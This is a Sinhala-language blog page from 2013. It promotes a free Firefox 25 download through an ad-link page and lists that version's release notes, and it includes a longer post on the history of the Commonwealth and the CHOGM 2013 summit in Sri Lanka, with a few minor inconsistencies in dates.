සැලකිය යුතුයි !! / Considerable !!


යම් කිසි ඩවුන්ලෝඩ් ලින්ක් එකක් ක්ලික් කල පසු , විවෘත වන පිටුවේ
දකුණු පස , උඩ තිබේන 'Skip Ad' ක්ලික් කල පසු , ඔබට අවශ්‍ය දේ ඩවුන්ලෝඩ් කර ගත හැක.

After You Click Download Button , Click 'Skip Ad' In Top Of Right Side.
Yup !! Now U Can Free Download It !!


හිර වෙන්නේ නැති , Slow වෙන්නේ නැති , 2013 දි නිකුත් වු අලුත්ම Firefox 25 , Web Browser එක ගැන දැන ගෙනම , Firefox 25 , Web Browser එක නොමිලේ කෙළින්ම ඩවුන්ලෝඩ් කරගන්න. [ Free Download Latest & New Mozilla Firefox 25 , Web Browser. ]


ඔන්න ඉතින් , ගිය සතියේ 10 වෙනි ඉරිදා පටන් හම්බන්තෝටින් , ගාලේන් හා හික්කඩුවේන් පටන් ගත්තු CHOGM 2013 - Sri anka හෙවත් ශ්‍රී ලාංකා පොදු රාජ්‍ය මණ්ඩල සමුළුව අද ( 2013/11/17 ) කොළඹින් අවසන් වෙනවා.
සමුළුව අදින් අවසන් වෙන එක ගැන මට නම් පොඩි දුකක් තියේනවා. ඒත් , ඉතින් හැම දේකටම නිශ්චිත කාලයක් තියේනවනේ.
අපිත් CHOGM හෙවත් පොදු රාජ්‍ය මණ්ඩලය , සමුළුව හා සමුළුවේ ශ්‍රී ලාංකාවේ තත්වය ඇතුලව තවත් බොහෝ දේ ගැන දැන ගන්න පොස්ට් එකක් ලිව්වා. ඒක බැලුවේ නැත්නම් මෙතනින් ගිහින් බලන්න.

හරි.
අද වන විට ලෝකයේ බොහෝ දෙනෙක්ට අන්තර්ජාලය නැතුවම බැරි දෙයක් වෙලයි තියේන්නේ.
ඉතින් , අපිට පරිගණකයේ තියේන Folder එක ක්ලික් කරල , අන්තර්ජාලයට පිවිසෙන්න බැනේ.
අපේ පරිගණක වලින් අන්තර්ජාලයට පිවිසෙන්න , විශේෂිත මෘදුකාංග වර්ගයක් , අපේ පරිගණක වලට Install කරන්න ඕන. ඒ මෘදුකාංග , Web Browser ලෙස හදුන්වනවා.
Web Browsers වලට සිංහලේන් , වෙබ් ගවේශක කියල තමයි කියන්නේ.

ඉතින් , දැනට ලොව පුරා ඉතාමත්ම ප්‍රසිද්ධ Web Browsers හෙවත් වෙබ් ගවේශක කිපයක් තියේනවා.

1. ) Mozilla FireFox.
2. ) Google Chrome.
3. ) RockMelt.
4. ) Torch.
5. ) Apple Safari.

අපි මිට කලින් Torch , Web Browser එක ගැන කතා කරල , ඒක නොමිලේ කෙළින්ම ඩවුන්ලෝඩ් කරගන්නත් දුන්නා. ඒ පොස්ට් එක බලන්න ඕන නම් මෙතනින් ගිහින් බලන්න.

* අද අපි කතා කරන්නේ දැනට ලොව තියේන Web Browser එක හෙවත් වෙබ් ගවේශක වලින් ප්‍රසිද්ධම Web Browser එක වන Mozilla Firefox එක ගැනයි.

2013 අගෝස්තු මාසයේදි Mozilla Firefox , Web Browser එකේ අලුත්ම Version එක විධියට 25 වන Firefox , Version එක නිකුත් වුනා.

මේ Firefox , Web Browser එකේ 25 වන සංස්කරණයේදි Firefox , Web Browser එකේ නිල ලාංඡනය පවා වෙනස කරල තිබුනා.
ඒ වගේම Share Button , Mixed Content Blocker හා Network Monitor වැනි අලුත්ම විශේෂාංග කිපයකුත් එකතු කරල තියේනවා.

මේ තියේන්නේ Firefox 25 , Web Browser එක සදහා අලුත් කරපු නිල හා එහි තිබේන සලකුණු මගින් කියවෙන දේවල්.
[ මෙම පින්තුරය අපැහැදිලි නම් , මෙම පින්තුරය මත ක්ලික් කරන්න. ]



ඒ වගේම මේ Firefox 25 , Web Browser එක මොකක් හරි වෙබ් හෝ බ්ලෝග් සයිට් එකකට යද්දි හිර වෙන්නෙවත් , Slow වෙන්නෙවත් නැ.
ඒ වගේම ගොඩක් ඉක්මණට වෙබ් හා බ්ලෝග් සයිට් Open වෙනවා.

මේ Firefox 25 , Web Browser එකේ වෙනස් කරපු දේවල් , අලුතේන්ම එකතු කරපු දේවල් ගැන , මේ පහල වගුවෙන් බලා ගන්න පුලුවන්.

What’s New.

  • NEW
    Mixed content blocking enabled to protects users from man-in-the-middle attacks and eavesdroppers on HTTPS pages. ( learn more )
  • NEW
    Options panel created for Web Developer Toolbox.
  • CHANGED
    "Enable JavaScript" preference check box has been removed and user-set values will be reset to the default.
  • CHANGED
    Updated Firefox Logo.
  • CHANGED
    Improved about:memory's functional UI.
  • CHANGED
    Simplified interface for notifications of plugin installation.
  • CHANGED
    Enabled DXVA2 on Windows Vista+ to accelerate H.264 video decoding.
  • CHANGED
    Users can now switch to a new search provider across the entire browser.
  • CHANGED
    CSP policies using the standard syntax and semantics will now be enforced.
  • CHANGED
    <input type='file'> rendering improvements. ( see bug 838675 )
  • CHANGED
    Replace fixed-ratio audio resampler in webrtc.org capture code with Speex resampler and eliminate pseudo-44000Hz rate.
  • CHANGED
    " Load images automatically " and Always show the tab bar checkboxes removed from preferences and reset to defaults.
  • DEVELOPER
    HTML5 <input type="range"> form control implemented.
  • DEVELOPER
    Write more accessible pages on touch interfaces with new ARIA role for key buttons.
  • DEVELOPER
    Social share functionality.
  • DEVELOPER
    Added unprefixed request Animation Frame.
  • DEVELOPER
    Implemented a global browser console.
  • DEVELOPER
    Dropped blink effect from text-decoration: blink; and completely removed <blink> element.
  • DEVELOPER
    New feature in toolbox: Network Monitor.
  • FIXED
    Various security fixes.

හරි , ඒ නිසා මොන අතින් බැලුවත් මේ Mizilla Firefox 25 , Web Browser එක පට්ටම සුපිරි විධියට හදල තියේනවා.
ඒ නිසා දැනට Firefox 25 නොවන ඊට වඩා පරණ Firefox , Web Browser එකක් පාවිච්චි කරන අය , ඉක්මණටම මේ අලුත්ම අලුත් , සුපිරි විශේෂාංග තියේන Firefox 25 , Web Browser එක , ඔබේ පරිගණකයට Install කරගන්න.

* ඔබ පාවිච්චි කරන Firefox 25 හෝ වෙනත් Firefox හෝ Google Chrome , Skype ආදි ඕනැම එකක් හිර වෙන්න ගත්තෝත් , Slow වෙන්න ගත්තෝත් , ඒක ලේසියේන්ම හදා ගන්න විධිය මෙතනින් ගිහින් දැන ගන්න.

* මේ පහල Firefox පින්තුරය ක්ලික් කරල , Firefox 25 , Web Browser එක නොමිලේ කෙළින්ම ඩවුන්ලෝඩ් කරගන්න.

* මේක ඩවුන්ලෝඩ් කරගන්න කලින් , මේ පිටුවේම උඩ තියේන අර සැලකිය යුතුයි සටහන හරියටම කියවලා ඉන්න.

* Before You Download This , Please Read That Considerable Note In Top Of This Page.


Free Download Firefox 23

මේ අලුත් Firefox 25 , Web Browser එක ගැන හා මෙම පොස්ට් එක ගැන අනිවාරේන්ම Comment එකක් දාන්න.

8 Comments:

CHOGM හෙවත් පොදු රාජ්‍ය මණ්ඩලය , සමුළුව හා සමුළුවේ ශ්‍රී ලාංකාවේ තත්වය ඇතුලව තවත් බොහෝ දේ ගැන දැන ගන්න. [ CHOGM 2013 - Sri Lanka ( 2013 Nov 10 To 17 ) ]


මේ දිනවල ශ්‍රී ලාංකාවේ හැමෝම වගේ කතා කරන්නේ CHOGM හෙවත් පොදු රාජ්‍ය මණ්ඩලය හා සමුළුව ගැනයි.
ඒ නිසා , අපිත් හිතුවා මේ CHOGM හෙවත් පොදු රාජ්‍ය මණ්ඩලය හා සමුළුව ගැන පොඩ්ඩක් කතා කරන්න.


ඒ නිසා , වැඩි කතා මුකුත් නැතුව , අපි කෙළින්ම මාතෘකාවට යමු.

* පොදූ රාජ්‍ය මණ්ඩලය කියන්නේ බ්‍රිතාන්‍යයේ පුරෝගාමිත්වයෙන් බිහිවී ඇති සෙසු ජාත්‍යන්තර සංවිධාන වලට වඩා වෙනස් වූ සුවිශේෂ ගණයේ ජාත්‍යන්තර සමාගමයක් නැතහොත් සංවිධානයකි. 
මෙම සංගමය සමන්විත වන්නේ බ්‍රිතාන්‍ය අධිරාජ්‍යයට යටත්ව පැවති ඩොමීනියන් රටවලින් සහ නිදහස දිනාගත් යටත් විජිත වශයෙන් පැවති රටවලිනි. 

* පොදු රාජ්‍ය මණ්ඩලය ආරම්භ කළේ රටවල් 5කිනි. ( බ්‍රිතාන්‍ය , කැනඩාව , ඕස්ට්‍රේලියාව , නවසීලන්තය , දකුණු අප්‍රිකාව ) එදා මෙම සංවිධානය හැඳින්වූයේ " සුදු මිනිසාගේ සංගමය " ( White Man's Club ) යනුවෙනි. 1948 දී සමූහාණ්ඩුවක් බවට පත්වූ ඉන්දියාවට පොදු රාජ්‍ය මණ්ඩලීය සාමාජිකත්වය ලබාදීමත් සමඟ ඒතාක් සුදු මිනිසාගේ සංගමය බවට පත්ව තිබූ පොදු රාජ්‍ය මණ්ඩලය 1949 න් පසුව " විවෘත පොදු රාජ්‍ය මණ්ඩලය " ( Open Commonwealth ) බවට පත්විය. 


* මේ පොදු රාජ්‍ය මණ්ඩල සමුළුව තියන්නේ අවුරුදු 2න් , 2කට.

ඒ අනුව , මේ 2013 නිසා ඊලග පොදු රාජ්‍ය මණ්ඩල සමුළුව තියේන්නේ 2015 දියි.

* පොදු රාජ්‍ය මණ්ඩලයේ සාමාජිකත්වය වඩාත් වේගයෙන් වර්ධනය වන්ට පත්වූයේ දෙවන ලෝක යුද්ධයෙන් පසුව බ්‍රිතාන්‍ය අධිරාජ්‍යයෙන් නිදහස් වූ රටවල් සංඛ්‍යාව ක්‍රමයෙන් අධික වීමත් සමඟමය. 


* 1947ට පෙර රාජ්‍යයන් 5කින් සමන්විත වූ බ්‍රිතාන්‍ය පොදු රාජ්‍ය මණ්ඩලීය සාමාජිකත්වය 1950 දශකය තුළදී 12 දක්වාත් 1960 දශකය අගදී 31 දක්වාත් 1970 දශකය අගභාගයේදී 44 දක්වාත් 1980 දශකය අග වනවිට 49 දක්වාත් 1990 දශකය අවසන් වනවිට සාමාජික සංඛ්‍යාව 54 දක්වාත්වර්ධනය වී ඇත. 


* මේ පොදු රාජ්‍ය මණ්ඩලයට රටවල් එකතු වුනා කියල සලකන්නේ , ඒ ඒ රට , බ්‍රිතාන්‍යයයේන් නිදහස් වුන වර්ෂයයි.

ඒ කියන්නේ ශ්‍රී ලාංකාවට නිදහස ලැබුනේ 1948. ඒ වගේම ශ්‍රී ලාංකාව , මේ පොදු රාජ්‍ය මණ්ඩලයට එකතු වුනා කියල සැලකේන්නේත් 1948ම තමයි.


පොදු රාජ්‍ය මණ්ඩලීය සාමාජිකත්වය වර්ධනය.

කාල වකවාණු. රටවල් හා එකතු වුන වර්ෂයන්.
1867 - 1948 දක්වාබ්‍රිතාන්‍ය , කැනඩාව (1867) , ඕස්ට්‍රේලියාව (1900) , නවසීලන්තය (1907) , දකුණු අප්‍රිකාව (1910).
1948 - 1950 දක්වාඉන්දියාව (1947) , පකිස්තානය (1947) , ශ්‍රී ලංකාව (1948).
1950 - 1960 දක්වාමැලේසියාව (1957) , ඝානාව (1957).
1960 - 1970 දක්වානයිජීරියාව (1960) , ටැංසානියාව (1961) , සයිප්‍රස් (1961) , සියරාලියෝන් (1962) ,
ජැමෙයිකා (1962) , ට්‍රිනිඩෑඩ් හා ටොබැගෝ (1962) , කෙන්යා (1963) ,
මෝල්ටා (1964) , මලාවි (1964) , සැම්බියා (1964) , ගැම්බියා (1965) , ලෙසෝතෝ (1966) , ගුයානා (1966) , බොට්ස්වානා (1966) , බාර්බඩෝස් (1966) , ස්වාසිලන්තය (1968) , නාවුරු (1968) , මොරිෂස් (1968).
1970 - 1980 දක්වාටොංගෝ (1970) , සැමෝවා (1970) , බංග්ලාදේශය (1972) , බහබාස් (1973) ,
ග්‍රැනඩා (1974) , පැපුවා නිව්ගිනි (1975) , සී චෙල්ස් (1976) , තුවලු (1978) ,
සොලමන්දූපත් (1978) , ඩොමිනිකා (1978) , ශාන්ත ලුයිසා (1979) ,
ශාන්ත වින්සන්ට් (1979) , කිරිබති (1979).
1980 - 1990 දක්වාසිම්බාබ්වේ (1980) , වනුටු (1980) , බෙලිස් (1981) , ඇන්ටිගුවා සහ බැර්බුඩා (1981) , මාලදිවයින (1982) , ශාන්ත කිට්ස් හා නෙවියා (1983) , බෲනායි (1984) ,
පකිස්තානය (1989) , (1962 දී ඉවත් වී නැවත 1989 දී සම්බන්ධ විය.)
1990 - 2000 දක්වානැම්බියා (1990) , දකුණු අප්‍රිකාව (1994) (1961 දී ඉවත් වී යළි 1994 දී සම්බන්ධ විය) , මොසැම්බික් (1995) , කැමරූන් (1995) , පීජී (1997).
පොදු රාජ්‍ය මණ්ඩලයේ සුවිශේෂී ලක්‍ෂණ.

1. ) එම සංවිධානය සතුව ව්‍යවස්ථාවක් හෝ ප්‍රඥප්තියක් නොමැති වීම.

2. ) එහි කිසිම සාමාජිකයෙකුට සුවිශේෂී වගකීම් හෝ යුතුකම් පවරා නොතිබීම. ( එහෙත් එහි සෑම සාමාජික රටක්ම 1971 පොදු රාජ්‍ය මණ්ඩලීය මූලධර්ම ප්‍රකාශනයෙන් පිළිගත් මූලධර්ම අනුව කටයුතු කිරීමට ස්වේච්ඡාවෙන් වග බලා ගැනීම සාමාජික රටවල් විසින් අපේක්‍ෂා කෙරේ. )

3. ) පොදු රාජ්‍ය මණ්ඩලීය සාමාජික රාජ්‍යයන්ගේ නිදහස් බව හා බැඳීම් විරහිත බව. (මෙම සංවිධානයෙන් ඉවත්ව යාම මෙන්ම යළි සාමාජිකත්වය ලැබීමට ද එම රටවලට නිදහස ඇත.)

උදා:- 1972 දී පොදු රාජ්‍ය මණ්ඩලයෙන් ඉවත්ව ගිය පකිස්තානය 1989 දී යළිත් වරක් පොදු රාජ්‍ය මණ්ඩලයට සම්බන්ධ වීම.
1961 දී ඉවත්ව ගිය දකුණු අප්‍රිකාව 1994 දී යළි සාමාජිකත්වය ලැබීම. 

4. ) ලෝක ජනගහනයෙන් 1/4 කටත් වඩා වැඩි ප්‍රමාණයක් පොදු රාජ්‍ය මණඩලීය රටවල් තුළ ජීවත් වන අතර මෙම ජනගහන සංයුතියේ ප්‍රකට ලක්‍ෂණයක් වන්නේ ඒවායින් බහුතරය බහුවාර්ගික,බහු ආගමික, බහු භාෂාමය, බහු සංස්කෘතික ජන සමාජයන් වීමයි. 

5. ) සමස්තයක් වශයෙන් ගත් කල පොදු රාජ්‍ය මණ්ඩලීය රටවල් ලෝක දේශපාලනයේ දක්නට ලැබෙන විවිධ බලවතුන් ගෙන් යුක්ත රාජ්‍යයන් ගෙන් සමන්විතය.
උදා:-
මහ බලවතුන්1බ්‍රිතාන්‍යය.
මධ්‍යම බලවතුන්18ඕස්ට්‍රේලියාව , නවසීලන්තය , කැනඩාව. 
කුඩා රාජ්‍යයන්35තුවලු , කිරිබති , ඩොමිනිකා , මාලදිවයින. 
6. ) විවිධ දේශපාලන ක්‍රම අනුගමනය කරනු ලබන රටවලින් සමන්විතය.
ජනරජ33
එංගලන්තයේ රජවූ පුද්ගලයා තම රටේ රජ ලෙස සලකයි.16
වෙනම රජෙක් පත් කරගනී.05
මෙම සමූහාණ්ඩු අතර , 

# විධායක ජනාධිපති ක්‍රමය සහිත ජනරජ
උදා:- ශ්‍රීලංකාව , මාලදිවයින , මැලේසියාව , බංග්ලාදේශය.

# වෙස්මින්ස්ට' ක්‍රමය සහිත ජනරජ.
උදා:- ඉන්දියාව , සිම්බාබ්වේ , ඩොමිනිකා , සිංගප්පූරුව.

# තනි දේශපාලන පක්‍ෂ ක්‍රමයක් ඇති රටවල්.
උදා:- සිංගප්පූරුව.

# දේශපාලන පක්‍ෂ කිසිවක් නොමැති රටවල්.
උදා:- ලෙසෝතෝ , ටොංගෝ.

# බ්‍රිතාන්‍යයේ රජවූ පුදුගලයාම තම රජ ලෙස පිළිගත් රටවල්.
උදා:- ඇන්ටිගුවා.

# දේශීය රජුන් රාජ්‍ය නායකයා ලෙස පිළිගත් රටවල්.
උදා:- ලෙසෝතෝ , බෲනායි.

7. ) පොදු රාජ්‍ය මණ්ඩලීය රටවල් අතර සබඳතාව සහයෝගීතාව යන මූලධර්මය මත රඳා පවතී.

8. ) වසර 2 කට වරක් පවත්වන රාජ්‍ය නායක සමුළුවාර තවත් සුවිශේෂීත්වයකි. 
( පොදු රාජ්‍ය මණ්ඩලීය රාජ්‍ය නායක සමුළු වූකලී පොදු රාජ්‍ය මණ්ඩලීය රටවල පොදු ප්‍රශ්න විවෘතව සාකච්ඡා කළ සාකච්ඡා මණ්ඩපයක් මෙන්ම ජාත්‍යන්තර ප්‍රශ්න පිළිබඳ විවෘතව අදහස් පළ කළ පොදු රාජ්‍ය මණ්ඩලීය වේදිකාවක් ද විය. )

9. ) සමුළුව පවත්වන රටේ රාජ්‍ය නායකයාට ඉදිරි වසර දෙක සඳහා පොදුරාජ්‍ය මණ්ඩලීය රටවල සභාපතීත්වය හොබවන්න අවස්ථාව ලැබේ. ඒ අනුව වසර 2015 දක්වා ජනපති මහින්ද රාජපක්ෂ මහතාට එම අවස්ථාව ලැබේ. 


පොදු රාජ්‍ය මණ්ඩලීය මහ ලේකම් කාර්යාලය.


* පොදු රාජ්‍ය මණ්ඩලය සුවිශේෂී ජාත්‍යන්තර සමාගමයක් වූ හෙයින් එහි කේන්ද්‍රගත පාලනයක් හෝ ලිඛිත ව්‍යවස්ථාවක් නොවීය. 

* 1965 දී පොදු රාජ්‍ය මණ්ඩලීය මහ ලේකම් කාර්යාලය පිහිටුවනු ලබන තෙක් එහි සාමාජික රටවල් අතර සම්බන්ධීකරණය පවත්වා ගනු ලැබුවේ බ්‍රිතාන්‍ය විසිනි. 

* මහ ලේකම්වරයෙකු පත් කිරීම හා කාර්යාලයක් පිහිටුවීම පිළිබඳව 1965 දී ගත් තීරණය පොදු රාජ්‍ය මණ්ඩලීය ඉතිහාසයේ බෙහෙවින් වැදගත්ය. 
මන්ද යත් එහි සංස්ථා පත්‍රයට අනුව එතැන් පටන් පොදු රාජ්‍ය මණ්ඩලීය සියලුම රටවල් " තත්ත්වය අතින් බ්‍රිතාන්‍ය හා සමාන වීමත් " එහි කළමණාකරණය හා මූල්‍ය කටයුතු සියලුම සාමාජික රටවල් විසින් පොදු අරමුණු සාක්‍ෂාත් කර ගැනීම සඳහාත් පවත්වා ගෙන යෑමේ පදනම ඉන් වැටුණු හෙයිනි. 
ඒ අනුව මහ ලේකම් කාර්යාලය ( ලන්ඩන්හි මාල්බරෝ හවුස් නම් ස්ථානයේ ) පිහිට වූ තැන් පටන් පොදු රාජ්‍ය මණ්ඩලීය කටයුතු සංවිධාන ව්‍යුහයේ ප්‍රධාන ආයතනය වූයේ එයයි. 

අපි ඒ කලින් කතා කරේ පොදු රාජ්‍ය මණ්ඩලයේ හා සමුළුවේ ඉතිහාසය හා ලක්ෂණ ගැනයි.



ශ්‍රී ලාංකා පොදු රාජ්‍ය මණ්ඩල සමුළුව.

CHOGM 2013 - Sri Lanka. )


* දැන් , අපි වර්තමානයට එමු. 
ඒ කියන්නේ මේ 2013 අපේ ශ්‍රී ලාංකාවේ පැවත්වෙන පොදු රාජ්‍ය මණ්ඩලය ගැන කතා කරමු.
මේ ශ්‍රී ලාංකාවේ පැවත් වෙන්නේ 22 වන පොදු රාජ්‍ය මණ්ඩලිය සමුළුවයි.

* මෙම පොදු රාජ්‍ය මණ්ඩලිය සමුළුව නම් කර තිබෙන්නේ CHOGM 2013 - Sri Lanka ලෙසයි.

* මේ පොදු රාජ්‍ය මණ්ඩල සමුළුවේ ප්‍රධානම කොටස වන පොදු රාජ්‍ය නායක සමුළුවට තිබ්බේ 2013 නොවැම්බර් මස 15 වන සිකුරාදයි. ඒත් ,  ඒ නායක සමුළුවට කලින් තවත් වැදගත් සමුළු කිපයක් පැවත් වුනා.

* පොදු රාජ්‍ය නායක සමුළුවට කලින් මුලින්ම ආරම්භ වුනේ පොදු රාජ්‍ය මණ්ඩල තරුණ සමුළුවයි. ඒ 2013 නොවැම්බර් මස 10 වන ඉරිදා , හම්බන්තොට , මාගම්පුර රුහුණු සම්මන්ත්‍රණ මධ්‍යස්ථානයේදියි.
මේ තරුණ සමුළුව පැවත් වුනේ 9 වන වතාවටයි. මේ සදහා රටවල් 53කින් , තරුණ තරුණියන් 106ක් පැමිණියා.
සියලුම මාධ්‍ය වලින් වාර්තා කරන අන්දමට , මේ පොදු රාජ්‍ය තරුණ සමුළුව සාර්ථකව තිබිල තියේනවා.
ඒ වගේම , මේ පොදු රාජ්‍ය මණ්ඩල තරුණ සමුළු කාර්ය මණඩලයට නවක සාමාජිකයන් තෝරා ගැනිමේදි , 3න් දෙනෙකුටත් , එහිදි තනතුරු හිමි වුනා.
මේය 2013 නොවැම්බර් මස 14 වන බ්‍රහස්පතින්දා දිනයේදි අවසන් වුනා.

මේ තියේන්නේ ශ්‍රී ලාංකා පොදු රාජ්‍ය මණ්ඩල තරුණ සමුළුව සදහා නිර්මාණය කරපු නිල ලාංඡනය.

* ඒ වගේම , පොදු රාජ්‍ය නායක සමුළුවට කලින් 2නියට ආරම්භ වුනේ Peoples' Forum එකයි. ඒ 2013 නොවැම්බර් මස 10 වන ඉරිදායි.
මෙහි සමාරම්භක උළෙල ගාල්ල නගරයේ , කොටුවේදි පැවත් වුන අතර සමුලුවේ ඉදිරි වැඩ කටයුතු ගාල්ලේන් විනාඩි 30ක් පමණ දුරින් තිබේන හික්කඩුව නගරයේ , Chaya Tranz ( Coral Gardens ) හෝටලයේදි සිදු කෙරුනි.
මෙම සමුලුවත් , ඉතා හොදින් වුනා. ඒ වගේම සමුළුව නිසා මිනිස්සුන්ට වෙනම දැඩි ආරක්ෂාවක් තිබුනේත් නැ. සමුළුව සාමාන්‍ය විධියට තිබුනා.
මෙය 2013 නොවැම්බර් මස 13 වන බදාදා දින අවසන් වුනා.

මේ තියේන්නේ ශ්‍රී ලාංකා පොදු රාජ්‍ය මණ්ඩල Peoples' Forum එක සමුළුව සදහා නිර්මාණය කරපු නිල ලාංඡනය.

* පොදු රාජ්‍ය නායක සමුළුවට කලින් 3 වෙනියට ආරම්භ වුනේ වෙළද සමුළුවයි. මෙය 2013 නොවැම්බර් මස 11 වන සදුදා , කොළඹ සිනමන් ග්‍රැන්ඩ් හෝටලයේදි පැවත් වුනා.
මෙහිදි , පොදු රාජ්‍ය සමුළුවක ප්‍රථම වතාවට රටව 84කින් ආයෝජකයන් 1000කට වැඩි ප්‍රමාණයක් ලබා ගැනිමට , ශ්‍රී ලාංකාවට හැකි වුනා.
මේ වගේ ආයෝජකයන් 1000කට වැඩි ප්‍රමාණයක් එකවර සොයා ගන්නව කියන්නේ , එක රටකට ගොඩාක් හොද වටිනා තත්වයක්.
මෙය 2013 නොවැම්බර් මස 14 වන බ්‍රහස්පතින්දා දින අවසන් විය.

* මේ ආදි වශයේන් තවත් සමුළු කිපයක්ම පොදු රාජ්‍ය නායක සමුළුවට කලින් පැවත් වුනා. ඒ සැම සමුළුවකින්ම , ශ්‍රී ලාංකාවට වටිනා වැදගත් දේයක් එකතු වුනා කියල අපි හිතනවා.
ඒ ගැන හරියටම බලා ගන්න පුලුවන් වෙන්නේ තව අවුරුදු කිපයකින් තමයි.

ඒ නිසා , ඒ අවුරුදු කිහිපය ගෙවි ගිහින් , මේ 2013 පැවති පොදු රාජ්‍ය මණ්ඩලිය සමුළුවේන් ශ්‍රී ලාංකාවට , ලැබුන , එකතු වුන දේවල් නිසා ශ්‍රී ලාංකාව ඉන්නේ ලොව මොන වගේ ස්ථානයකද කියල අපටම බලා ගන්න පුලුවන්.

* හරි.
මේ වේ ප්‍රධානියා වෙන්නේ යේ එලිසබේත් රැජින. ඒත් , එතුමියගේ නොපැමිනිම නිසා , මෙවර ප්‍රථම වතාවට පොදු රාජ්‍ය මණ්ඩලිය සමුළුවක් , එතුමියගේ පුතු වන චාල්ස් කුමරු විසින් මෙහයවනවා.
ඒ නිසා , 2013 නොවැම්බර් මස 14 වන බ්‍රහස්පතින්දා දින සවස 4න් පසුව චාල්ස් කුමරු හා කැමිලා පාකර් ආදිපාදිවරිය ශ්‍රී ලාංකාවට පැමිණියා.
ඒ වගේම 2013 නොවැම්බර් මස 14 වන දිනයේදි චාල්ස් කුමරුගේ 65 වන උපන් දිනය යෙදි තිබුනා. චාල්ස් කුමරු , උපන් දිනය සැමරුවේත් ශ්‍රී ලාංකාවේ දිමයි.
* ඒ වගේම චාල්ස් කුමරු , තම 65වන උපන් දිනය නිමිත්තේන් , කුමරුගේ අප්‍රකට කරුණු 65ක් ගැන කිව්ව. ඒ කරුණු 65 ගැන දැන් ගන්න මෙතනින් යන්න. 

* මේ , පොදු රාජ්‍ය මණ්ඩලිය සමුළුවේ ප්‍රධානම කොටස වන පොදු රාජ්‍ය නායක සමුළුවේ සමාරම්භක උළෙල 2013 නොවැම්බර් මස 15 වන සිකුරාදා දිනයේදි , කොළඹ මහින්ද රාජපක්ෂ නෙළුම් පොකුණ රන්ග ශාලාවේදි පැවත් වුනා.
ඉන් පසුව , මෙහි ඉදිරි වැඩ කටයුතු කොළඹ , බණ්ඩාරනායක අනුස්මරණ සම්මන්ත්‍රණ ශාලාවේදි පැවත් වෙනවා. 

* මේ පොදු රාජ්‍ය මණ්ඩලිය සමුළුව ශ්‍රී ලාංකාවේ තියේන එක ගැන ගොඩක් දෙනෙක් එක එක කතා කියනවා.
ඒ සමුළුවේ හොද පැත්ත වගේම නරක පැත්ත ගැනත්.

නමුත් , හැම තිස්සේම නරක පැත්ත ගැන හිතන්නේ නැතුව හොද පැත්ත ගැන හිතුවෝත් අපට ලැබෙන ප්‍රයෝජන ගොඩයි.

* ඔයාල දන්නව ඇති , දැනට අවුරුදු ගොඩක් කාලේකට පෙර ශ්‍රී ලාංකාවට , සිංගප්පුරුවේ ජනාධිපති ආපු වෙලාවේ ඒ කාලේ ලාංකාවේ තිබුන දියුණුව දැකල , කවද හරි දවසක සිංගප්පුරුවත් , මේ ශ්‍රී ලාංකාවේ දියුණු තරමට දියුණු කරනව කියල කිව්වා.
අපේ රටට ඇවිත් , සිංගප්පුරුව දියුණු කිරිමේ සැලස්ම හිතේ තියන් ගියපු ජනපතිට , ඒ දියුණුව  හරියට ආරම්භ කරන්න පුලුවන් වුනේ 1972 දි සිංගප්පුරුවේදි පොදු රාජ්‍ය මණ්ඩල සමුළුව පැවත් වුනාට පසුවයි. මොකද , සිංගප්පුරුව දියුණු කිරිමට අවශ්‍ය සැලස්ම  ශ්‍රී ලාංකාවෙන් ගත්තත් , ඒ සදහා අවශ්‍ය කරපු සම්පත් සියල්ලම සොයා ගැනිමට හැකි වුනේ 1972 පොදු රාජ්‍ය මණ්ඩල සමුළුවේන් පසුවයි.

* මම කලින් කියපු විධියට පොදු රාජ්‍ය මණ්ඩල සමුළු ඉතිහාසයේ ප්‍රථම වතාවට පොදු රාජ්‍ය මණ්ඩලිය වෙළද සමුළුවකට සහභාගි වුන රටවල් 84කින් , අපේ රටේ අලුතේන් ව්‍යාපාර කටයුතු ආරම්භ කරන්න ආයෝජකයන් 1000කට වැඩි ප්‍රමාණයක් ලැබිම ම , ගොඩාක් ලොකු දෙයක්.

* ඒ නිසා , අපේ ශ්‍රී ලාංකාවේ පැවත් වෙන පොදු රාජ්‍ය මණ්ඩල සමුළුවෙත් හොද පැත්ත දැකල , පොදු රාජ්‍ය මණ්ඩල සමුළුව ගැන සුභවාදි ආකල්ප ගොඩනගා ගන්න.

* දැන් , මේ CHOGM හෙවත් පොදු රාජ්‍ය මණ්ඩලයට හා සමුළුවට සහ 2013 CHOGM - Sri Lanka හෙවත් ශ්‍රී ලාංකා පොදු රාජ්‍ය මණ්ඩල සමුළුවට අදාල විශේෂ සලකුණු කිපයක් ගැන බලමු.

* මේ තියේන්නේ ශ්‍රී ලාංකා පොදු රාජ්‍ය මණ්ඩල සමුළුව සදහා නිර්මාණය කරපු නිල ලාංඡනය.



* පොදු රාජ්‍යය මණ්ඩලීය , රාජ්‍යය නායක සමුළුවේ නිල කොඩිය.



* මේ තියේන්නේ ශ්‍රී ලාංකා පොදු රාජ්‍ය මණ්ඩල සමුළුව සදහා නිර්මාණය කරපු නිල වෙබ් සයිට් එක 

www.chogm2013.lk

මේ වෙබ් සයිට් එක හදන්න රුප්යල් මිලියන 15ක් ගියා කියල ගොඩක් දෙනෙක් කියනවා.

ඒත් , එහමස කියන කිසි කෙනෙක්ට , මේ සයිට් එක හදන්න රුපියල් මිලියන 15ක් ගියා කියන එක ඔප්පු කරන්න තියා , ඒය ඔප්පු කිරිමට ඕන එක සාක්ෂියක්වත් ඉදිරිපත් කරන්න බැරි වුනා.
ඒ නිසා , මමත් , මේ සයිට් එක හදන්න රුපියල් මිලියන 15ක් ගිය කියන කතාව , කවදාවත්ම පිළිගන්නේ නැ.

මොකද , මේ සදහා කිසිම සාක්ෂයක්වත් නැ. සාක්ෂි දුන්නෝත් , මම එක අනිවා පිළිගන්නවා.

* මේ ඉන්නේ පොදු රාජ්‍ය මණ්ඩලයේ හා සමුළුවේ ප්‍රධානියා වන 2 වන එලිසබෙත් රැජිනයි.




* 2 වන එලිසබෙත් රැජිනගේ පුත් චාල්ස් කුමරු.



මේ තියේන්නේ චාල්ස් කුමාරයගේ තරුණ කාලේ පින්තුරයක්.



* පොදු රාජ්‍ය මණ්ඩලයේ හා සමුළුවේ මහ ලේකම් කමලේශ් ශර්මා මහතා.

මෙතුමා පස් වැනි මහ ලේකම්වරයාය පත් වුයේ 2008 දීය. 
මහා බ්‍රිතාන්‍යයයේ හිටපු ඉන්දියා මහ කොමසාරිස්වරයාය. ඔහු පොදු රාජ්‍යය මණ්ඩල ලේකම් කාර්යාලයයේ හා පොදු රාජ්‍යය මණ්ඩල පාලක මණ්ඩලයේ සාමාජිකයෙකි.

